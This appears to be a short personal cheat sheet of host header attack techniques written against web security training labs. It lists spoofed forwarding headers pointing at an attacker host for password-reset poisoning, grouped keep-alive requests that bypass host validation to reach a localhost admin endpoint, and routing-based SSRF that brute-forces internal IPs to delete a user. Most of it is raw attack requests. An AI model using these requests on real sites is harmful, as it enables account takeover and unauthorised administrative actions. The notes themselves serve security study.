Host Headers
Spoof of ip address when reset password:
#use one of this
X-Forwarded-Host: EXPLOIT.net
X-Host: EXPLOIT.net
X-Forwarded-Server: EXPLOIT.net
Sending grouped request in sequence using single connection and setting the connection header to keep-alive, bypass host header validation and enable SSRF exploit of local server.
GET / HTTP/1.1
Host: TARGET.net
Cookie: session=ValueOfSessionCookie
Content-Length: 48
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive
POST /admin/delete HTTP/1.1
Host: localhost
Cookie: _lab=YOUR-LAB-COOKIE; session=YOUR-SESSION-COOKIE
Content-Type: x-www-form-urlencoded
Content-Length: 53
csrf=TheCSRFTokenValue&username=carlos
Try to get to the admin page through localhost or lan ip. Collaborator request will confirm that it is possible to access out of band resource
#Full path in request
GET / or https://YOUR-LAB-ID.web-security-academy.net/
Host: BURP-COLLABORATOR-SUBDOMAIN or 192.168.0.$$
#than try to guess ip from intruder and run admin to get csrf and then do action
GET /admin
Host: 192.168.0.17
GET /admin/delete?csrf=jslsjf?username=carlos
Host: 192.168.0.17
Last updated